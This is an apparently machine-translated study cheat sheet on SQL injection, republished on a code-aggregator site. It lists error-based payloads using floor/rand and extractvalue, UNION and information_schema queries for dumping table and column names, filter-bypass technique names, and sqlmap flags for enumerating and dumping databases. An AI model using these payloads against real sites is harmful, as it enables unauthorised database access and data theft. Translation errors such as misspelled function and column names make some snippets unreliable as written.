sql injection knowledge consolidation (Basic Edition)

Others 2019-07-21 23:03:07 views: null

sql injection knowledge consolidation (Basic Edition)

The basic steps

  1. Determine whether the error
  2. Analyzing closed symbols
  3. Analyzing injection type
  4. Construction of payload
  5. Manual injection or scripting

The basic injection type

  • Error-type implant
    • floor formula (results - a 1): and (select 1 from (select count (*), concat ((payload), floor (rand (0) * 2)) x from information_schema.tables group by x) a)
    • extractvalue formula (both have a wave number): and extracvalue (1, concat (0x7e, (payload), 0x7e)
  • Boolean injection
  • Joint query
    • Echo Point query: UNION SELECT 1,2,3;
  • Delay Injection

Other injection techniques

  • HPP bypass WAF
  • Injection byte wide filter bypass quotes
  • CHAR function filter bypass quotes
  • || and && bypass the filter and and or
  • Delimiting character string to bypass a filter
  • Secondary injection
  • Linux special characters to bypass the space filter
  • Bracketing bypass the filter box

Common SQL statements and functions

  • Take substring: mid (string, start, length)
  • Take substring: left (string, length)
  • 取ASCII:ascii(char)
  • Query the current database: database ()
  • Query the current user: user ()
  • The current database version: @@ version
  • Database file path: @@ datadir
  • 爆表:select table_name from information_schema.tables where table_schema='database'
  • 爆库:select column_name from information_schema.columns where table_schem='database' and table_name='table'
  • String concatenation: concat ()
  • String in the set of output: group_concat ()
  • Separator according connection: concat_ws (char, ...)
  • The number of fields guess: ORDER BY x

sqlmap use basis

  • -u specified url
  • -p parameter specified
  • -D specifies the database
  • -T specified table
  • -C specified field
  • --current-db current database
  • --current-user of the current user
  • --dbs all database queries
  • --tables query all the tables
  • --columns query all the field names
  • --dump Search record
  • --techniques X (X = B Boolean, E being given, U-joint injection type, T-type delay): Specifies the type of injection

important point

  • Special symbols to be coded, such as &
  • + In the GET parameters will become spaces
 

Guess you like

Origin www.cnblogs.com/tiumo/p/11222154.html
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com